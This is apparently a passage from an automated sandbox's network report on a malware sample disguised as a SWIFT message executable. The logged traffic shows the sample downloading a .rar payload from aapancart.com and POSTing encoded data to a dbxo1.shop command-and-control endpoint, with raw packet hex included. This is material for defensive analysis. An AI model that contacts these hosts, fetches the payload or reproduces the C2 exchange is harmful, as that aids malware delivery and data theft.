Nov 28, 2022 12:46:58.397949934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397959948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397970915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397980928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397991896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.398003101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.398013115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.398024082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.398034096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.398045063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.398053885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.398082972 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.398258924 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.398355007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.405006886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405268908 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.405297041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405309916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405319929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405330896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405344009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405355930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405366898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405378103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405388117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405399084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405409098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405419111 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.405420065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405431032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405441999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405452967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405463934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405474901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405484915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405495882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405507088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405518055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405582905 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.405643940 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.405729055 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.405734062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405745029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405754089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405764103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.405921936 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.405973911 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.431687117 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.632663012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.632853031 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:00.344424963 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:00.356705904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.583358049 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.593084097 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.593332052 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.593868971 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.593885899 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.593971014 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.593993902 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.603913069 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604028940 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604043961 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604054928 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604067087 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604094982 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604098082 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.604105949 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604118109 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604131937 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604144096 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.604270935 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.604316950 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.604485035 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.612596035 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.612623930 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.612870932 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.612894058 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.612926960 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.612941027 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.612960100 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.612974882 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.613123894 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.613189936 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.613207102 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.904540062 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.904616117 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:09.904783964 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.904783964 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.905004025 CET	49838	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:47:09.913552046 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:10.132586002 CET	80	49838	172.67.203.65	192.168.11.20
Nov 28, 2022 12:47:10.132805109 CET	49838	80	192.168.11.20	172.67.203.65

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 12:46:55.577858925 CET	63342	53	192.168.11.20	1.1.1.1
Nov 28, 2022 12:46:55.594774961 CET	53	63342	1.1.1.1	192.168.11.20
Nov 28, 2022 12:46:56.735022068 CET	53223	53	192.168.11.20	1.1.1.1
Nov 28, 2022 12:46:56.763128996 CET	53	53223	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 28, 2022 12:46:55.577858925 CET	192.168.11.20	1.1.1.1	0xf676	Standard query (0)	aapancart.com	A (IP address)	IN (0x0001)	false
Nov 28, 2022 12:46:56.735022068 CET	192.168.11.20	1.1.1.1	0x273f	Standard query (0)	dbxo1.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 28, 2022 12:46:55.594774961 CET	1.1.1.1	192.168.11.20	0xf676	No error (0)	aapancart.com	103.14.99.114	A (IP address)	IN (0x0001)	false
Nov 28, 2022 12:46:56.763128996 CET	1.1.1.1	192.168.11.20	0x273f	No error (0)	dbxo1.shop	172.67.203.65	A (IP address)	IN (0x0001)	false
Nov 28, 2022 12:46:56.763128996 CET	1.1.1.1	192.168.11.20	0x273f	No error (0)	dbxo1.shop	104.21.44.194	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

aapancart.com

dbxo1.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49834	103.14.99.114	443	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49836	172.67.203.65	80	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2022 12:46:56.779159069 CET	304	OUT	POST /db1/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: dbxo1.shop Content-Length: 113 Cache-Control: no-cache Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 17 8b 30 6d 8b 30 60 8b 30 6c 8b 30 65 8b 30 63 8b 30 60 8b 30 61 8b 31 11 8b 30 66 8b 30 67 ec 45 14 8b 30 65 8b 30 6c 8b 30 60 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0m0`0l0e0c0`0a10f0gE0e0l0`
Nov 28, 2022 12:46:57.711672068 CET	305	IN	HTTP/1.1 200 OK Date: Mon, 28 Nov 2022 11:46:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: Accept-Encoding,User-Agent CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hz5IaYEu8TWjqOE9PdRBFLj2VMwsAH4y7ypiQwVdRqYxQrOv0kfca95ggSIA19NHw3fKrdgrjtupYt4A%2FOs%2B8EOd7Kgq3efKa5gam9Xqv%2BLJOpCzJgK64CckkchE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7712ddb0eb27cb22-DUS alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 33 64 30 36 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 7b 18 ea 4a 20 e3 57 1c 9b 4f 3f eb 33 18 d7 37 61 e0 47 25 cf 52 04 9e 48 69 81 60 6b 92 6d 6b 07 16 0c 82 a6 43 b3 75 f4 a5 1e 37 09 14 00 82 a8 5f f0 71 f2 a7 56 79 0a 57 48 9e e6 00 b0 66 f1 a7 09 19 3c f6 65 ac cb 30 9e 06 9d cb 33 ab 99 66 65 17 cb 30 9e 02 9d cb 33 14 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 ec 66 66 65 a1 d4 8a 90 02 29 c2 fe 75 de 67 29 62 ea 64 f6 6b ee eb 43 26 09 01 17 ce a6 10 fd 63 f3 a5 5c 20 46 04 00 8f b9 45 f0 22 f4 a5 13 10 29 35 45 c2 a4 54 fb 2c 90 c6 39 70 66 66 65 af cb 30 9e d9 f0 c0 f2 cb 6a 03 f7 30 c7 55 0c 9d 91 ae a1 b8 08 03 f6 31 c7 55 0c ee f3 aa a0 c9 6a 03 f7 43 a5 aa 0c 9c 91 ae a1 b8 08 01 f6 31 c7 55 0c 50 f4 a8 5b cb 6a 03 f7 ff 8e 30 9e 4e 9c c9 33 d5 dc 44 c9 af cb 30 9e 02 9d cb 33 b4 66 64 44 a4 ca 3e 94 02 9b cb 33 54 62 66 65 af cb 30 9e 02 9d cb 33 54 76 66 65 af eb 30 9e 02 9d cb 23 54 76 66 65 af c9 30 9e 08 9d cb 33 5e 66 66 65 a5 cb 30 9e 02 9d cb 33 54 56 66 65 af c9 30 9e 0e d7 cb 33 57 66 26 60 af cb 34 9e 02 8d cb 33 54 66 76 65 af db 30 9e 02 9d cb 33 44 66 66 65 af da 30 9e 29 9e cb 33 54 66 66 65 af cb 30 9e 02 bd cb 33 a4 65 66 65 af cb 30 9e 02 9d cb 33 54 6a 66 65 97 f6 30 9e 02 9d cb 33 54 66 66 65 af db 30 9e 56 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 Data Ascii: 3d06?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP{J WO?37aG%RHi`kmkCu7_qVyWHf<e03fe03ffe03Tffe03Tffe03ffe)ug)bdkC&c\ FE")5ET,9pffe0j0U1UjC1UP[j0N3D03fdD>3Tbfe03Tvfe0#Tvfe03^ffe03TVfe03Wf&`43Tfve03Dffe0)3Tffe03efe03Tjfe03Tffe0V3Tffe03Tffe03Tffe0
Nov 28, 2022 12:46:57.711761951 CET	306	IN	Data Raw: 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 7a 12 03 1d db cb 30 9e 29 99 cb 33 54 76 66 65 af cd 30 9e 02 9f cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 74 66 66 05 81 Data Ascii: 3Tffe03Tffe03Tffe03z0)3Tvfe03Tffe03tffCa3efe03Tnfe03Tffe03D03offe0V3Tffe.q23Yffe03dfe0'Tffe03Tffe0P`$}kE$s0c9Km
Nov 28, 2022 12:46:57.711833000 CET	308	IN	Data Raw: 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 Data Ascii: 3Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03
Nov 28, 2022 12:46:57.711895943 CET	309	IN	Data Raw: 33 7a 66 57 65 9a cb 30 9e 46 9d cb 33 55 66 30 65 ce cb 42 9e 44 9d a2 33 38 66 03 65 e6 cb 5e 9e 64 9d a4 33 54 66 66 65 8b cb 34 9e 02 9d 9f 33 26 66 07 65 c1 cb 43 9e 6e 9d aa 33 20 66 0f 65 c0 cb 5e 9e 02 9d cb 33 5d 62 d6 61 af cb 30 9e 02 Data Ascii: 3zfWe0F3Uf0eBD38fe^d3Tffe43&feCn3 fe^3]ba03Tffe03Tffe03l[fe22RoLM[pU-"8do``3`lN42PXU'2PgR?3bg/26heg0EiC]g@d"kI7V
Nov 28, 2022 12:46:57.711961031 CET	310	IN	Data Raw: 95 ff bb a0 62 26 85 3b 65 0a 49 e9 e8 cf 3d b1 03 2e f7 0b 1a f0 06 6c 1f 93 c9 fc 8a 05 1b 4c 4a ab d2 ec 90 7e ca 50 30 18 1d 7b 47 fc 49 77 a8 ce ad 60 71 dd c3 54 6f 80 8f 1e a0 81 5a 92 6b 34 a4 1a bc 2a d7 99 c2 ff 6f 2a 3d ca b3 9c b2 5a Data Ascii: b&;eI=.lLJ~P0{GIw`qToZk4o=Z8ut!Ww%cJJ&Fx%Z\|~\0);PbYI\=Es~(Os<ZDd e13Tg@~^3Uffd=M{kd528do`f6GVwc
Nov 28, 2022 12:46:57.712023973 CET	312	IN	Data Raw: 9c 88 0c c4 33 18 ae aa 50 58 c3 2f 70 c1 5c 24 3b c3 f7 15 62 ad fc 1c dd 43 9d 7f 84 50 e5 0f ed 58 48 15 72 0d d3 da 16 13 4b 27 e7 af b7 76 c4 b6 8b 8e d2 15 77 51 0d 2f 77 6d f9 6d 20 d3 71 8d 64 31 bd 90 e3 58 59 4f 03 90 81 20 11 e2 73 ff Data Ascii: 3PX/p\$;bCPXHrK'vwQ/wmm qd1XYO sjl3xt?srJXifO8~O=+^}QVo1^UC0Y`oO)i6QfV:r1\9WU:BJd9k\'
Nov 28, 2022 12:46:57.712085962 CET	313	IN	Data Raw: 9d 74 3c 53 50 32 da f7 3e 30 b8 34 c9 75 da 2d c2 3f e9 fa b2 e4 57 c1 37 94 0b 11 79 20 5a b3 cf c4 49 11 03 1b 8e 0c f8 45 aa 8f 93 c4 9f bd ed 39 fb 3a 09 3a 49 4b 2c dd b4 4e 9d d8 4e 7a 0b d3 6f 9d 53 70 3a 72 58 2d d7 8c b0 75 9e 60 22 7a Data Ascii: t<SP2>04u-?W7y ZIE9::IK,NNzoSp:rX-u`"z*_@hu%=G([nYgk(e<`hWv8yIqIz37Fgv[N-b\|0AU^uBfg4ua"p'}woKKh1r.e05L!
Nov 28, 2022 12:46:57.712151051 CET	314	IN	Data Raw: f3 6b fe b9 5c 27 09 00 11 81 a8 5f f3 2d ed a0 5a 7b 05 03 17 db b8 1f d3 6b fe b9 5c 27 09 00 11 fd a4 5f ea 41 f8 b9 47 7a 05 14 11 9f d8 36 9d 57 80 ee 37 58 56 6c 63 a7 e0 36 9f 07 98 cc 30 5c 56 6b 63 a6 e1 b6 d6 84 6a c6 32 55 63 63 65 ac Data Ascii: k\'_-Z{k\'_AGz6W7XVlc60\Vkcj2UcceI2\:e!*-7+dDY sJ?G^61gdRI1$s)lc"nQ\|"{_RIfFZ 0w+&WTy7kEl@ka2H
Nov 28, 2022 12:46:57.712215900 CET	316	IN	Data Raw: 55 cc bc 20 9f 68 2f 0e 49 14 eb 32 1f c9 17 52 6f 4c e3 e7 4d c7 93 03 94 cd 02 d6 64 73 55 2d c9 21 9c 03 9c fb b2 da 56 11 54 a4 fb 39 98 01 c8 cf 35 47 64 33 36 9e d8 00 8f 04 9e 9e 37 5c 75 6c 32 ce b8 58 f7 6c fa bf 5c 3a 57 76 55 a1 cd 33 Data Ascii: U h/I2RoLMdsU-!VT95Gd367\ul2Xl\:WvU34T5W3bo}a@;EBmG=T/0G~+_mDoc'dv031+s0]`cN2knd~`lMx:WWmcj2SgVyJ<>UocT=5
Nov 28, 2022 12:46:57.712280989 CET	317	IN	Data Raw: 90 91 d9 c5 c7 1a 52 c9 00 80 03 59 e9 1d 12 a6 e1 dd ab 0e 2e aa 98 16 d0 d1 a5 76 2b 14 c4 86 e2 b6 ff 16 d0 58 3a d2 0c 6c ea 2a b1 bd 5d fb 75 51 a3 79 8b 65 f5 f4 40 ef 2c 5d b5 32 33 be 28 42 39 75 e1 00 9e ca 33 55 c5 e4 64 d5 fb b2 9f 74 Data Ascii: RY.v+X:l*]uQye@,]23(B9u3Udt5W3{@5Ubg65Uccb.Zbpa9G^6#1hV7c-{ V!7_ue$20bcv:6RT/gKRV0cUU6Udy`f@
Nov 28, 2022 12:46:57.712403059 CET	319	IN	Data Raw: 6c 3f 1a a8 27 cf 90 ef 1d d9 06 18 74 c0 db fd 90 c5 38 d8 7d 40 38 1c 11 b0 e0 e8 1e 20 27 c4 75 61 dd df 0c 4b 60 f3 ab f6 2a 28 c6 57 10 48 39 23 86 b5 df 2e f1 35 56 d2 00 d4 0c ef 28 0c a1 56 fd 7a 0e 1e 03 9b f3 79 67 ac ca 30 9f a1 1f ca Data Ascii: l?'t8}@8 'uaK`*(WH9#.5V(Vzyg0dg6)7UQp3.Re3x&{7l/De/BiGwT)2PgR4`Tf020{ia25W3{v2UVze!BrY?Q<[?P`e042x/"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49838	172.67.203.65	80	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2022 12:47:09.593868971 CET	4900	OUT	POST /db1/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: dbxo1.shop Content-Length: 32686 Cache-Control: no-cache
Nov 28, 2022 12:47:09.593885899 CET	4903	OUT	Data Raw: 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 17 8b 30 6d 8b 30 60 8b 30 6c 8b 30 65 8b 30 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0m0`0l0e0c0`0a10f0gE0e0l0`&f&f&g&fm1t&1e0d0e1em!q%j&-0c0a&f&f&f&f&f&fw=q)0d&fp3)0g0aF)1Bm@4`@x1l.aA7b@cGc
Nov 28, 2022 12:47:09.593971014 CET	4910	OUT	Data Raw: 1a fc 54 04 e0 4c 11 e9 5a 14 f9 51 01 fb 50 13 eb 45 1c e9 46 0d e7 54 0c e5 47 1b ea 5b 0f ea 42 1c fa 51 10 e7 59 04 e0 44 0c e4 4f 13 e9 42 12 eb 5a 16 e1 57 05 fd 4b 17 e7 4b 02 e0 4e 13 f8 41 16 fe 42 18 f9 55 0c e5 4a 10 fa 4d 12 e4 5b 07 Data Ascii: TLZQPEFTG[BQYDOBZWKKNABUJM[VFUYWLRZUIMYFNOJMRRVLGW[OVZMQHVB@RLSKLLIS[F@BIUYDJLB[G
Nov 28, 2022 12:47:09.593993902 CET	4912	OUT	Data Raw: 02 e0 5b 0c ff 52 13 ff 41 0f fb 47 05 e1 42 00 ea 49 17 fa 4a 17 f6 4a 12 e2 52 14 fb 42 11 f7 44 06 e0 4f 13 fc 53 17 e5 41 05 fb 56 0f ef 55 17 ed 41 0f ff 56 07 e1 5b 1a fe 55 0c e6 46 06 e1 51 19 e1 49 13 e4 54 10 fe 51 0d f6 44 03 eb 55 1b Data Ascii: [RAGBIJJRBDOSAVUAV[UFQITQDUBDYQQK[[LP@OGJREJO[FRBJRGUNFSGJTQYD[GEYP[VWEZYNVBN@AP[
Nov 28, 2022 12:47:09.604098082 CET	4913	OUT	Data Raw: 49 14 e8 47 1f ef 48 1b fc 56 18 fc 46 04 e8 4b 1e e5 4c 11 fc 4c 0d fa 59 1b ff 48 03 f8 41 18 ec 4c 1a f9 56 03 e8 51 05 e0 51 03 e7 4b 0f e0 42 16 e4 46 00 e8 4c 1e ec 57 11 ea 4c 0d ff 47 19 eb 59 1c e1 4c 07 fd 56 04 fd 4d 1c f6 4d 00 e9 52 Data Ascii: IGHVFKLLYHALVQQKBFLWLGYLVMMRHLMPZNJ@BVPMAFIISWPOVAAFTTER@BJEFRLO@EDKSZTDNQUUUiWU
Nov 28, 2022 12:47:09.604270935 CET	4926	OUT	Data Raw: fd 4e 0c ed 48 1c fd 46 06 e7 53 19 e7 5b 1f f9 53 1a fe 4e 1c e0 0e 5f fe 48 56 aa 17 55 ae 03 55 ae 03 55 ae 03 de 88 14 a2 ac 07 55 ae 01 51 ae 03 77 ae 03 55 e8 6a 39 cb 70 09 9f 5f 17 fb 45 0f fd 52 05 ed 4c 1d f2 54 1d f4 42 12 fe 53 05 e2 Data Ascii: NHFS[SN_HVUUUUQwUj9p_ERLTBSB{o&TBSBSKMOPDIETSHLDHRZJ[QLTVOE[IYOUMHHBTGWUIIL[IOUOFSP
Nov 28, 2022 12:47:09.604316950 CET	4931	OUT	Data Raw: 0c e3 40 05 eb 41 10 e2 51 0f e2 50 14 e6 40 1c e2 40 1f fb 54 06 e5 59 1d ea 40 11 ff 53 06 ed 4a 01 e3 4f 1b fe 4b 19 e6 5b 14 e0 47 06 e1 4d 16 e2 4f 14 eb 5b 1f fc 48 11 e3 5b 0f e7 4d 17 e4 48 1d eb 42 06 e7 50 06 e5 51 02 fb 5a 12 e8 4b 13 Data Ascii: @AQP@@TY@SJOK[GMO[H[MHBPQZK[MKKVRLMDHWUGZ[KLMZKVPAVNHFS[SN_HVUUUUQwUj9p_ERLTBSB{o&T
Nov 28, 2022 12:47:09.604485035 CET	4933	OUT	Data Raw: 02 57 a0 03 5b ae 03 55 ae 03 55 ae 03 55 dd 9f 5b 17 01 51 ae 03 57 aa 03 55 b9 03 55 ae 03 55 ae 03 54 ae 23 55 ae 03 30 bf 03 55 e8 6a 39 cb 70 09 9f 5f 00 ec 55 00 e0 57 06 ed 59 1f 80 7b 39 dd 7b 05 e5 02 57 a0 03 5b ae 03 55 ae 03 55 ae 03 Data Ascii: W[UUU[QWUUUT#U0Uj9p_UWY{9{W[UUU%%BYQWUUUT#UUj9p_YSO{9{W[UUUQWUUUT#UUj9p_OKTAQFJ{o&S[UUU%X9UQ
Nov 28, 2022 12:47:09.904540062 CET	4934	IN	HTTP/1.1 200 OK Date: Mon, 28 Nov 2022 11:47:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: User-Agent CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nvCuxVjSNFEkINIS4pyM8kfsGkam0q0y8cDjQGx5kc7De4nHvQ4F7pOAHz%2BFC39tDl8lSP%2F6Bf6fCkgNkLmhbHIiGI44WbOiDdGlrSvDxPlP11074egdPKtS7klP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7712de00fde76946-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a Data Ascii: 7falseOK
Nov 28, 2022 12:47:09.904616117 CET	4934	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49834	103.14.99.114	443	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-28 11:46:56 UTC	0	OUT	GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: aapancart.com Cache-Control: no-cache
2022-11-28 11:46:56 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 28 Nov 2022 11:46:52 GMT Server: Apache Last-Modified: Thu, 24 Nov 2022 21:47:56 GMT Accept-Ranges: bytes Content-Length: 114752 Connection: close Content-Type: application/x-rar-compressed
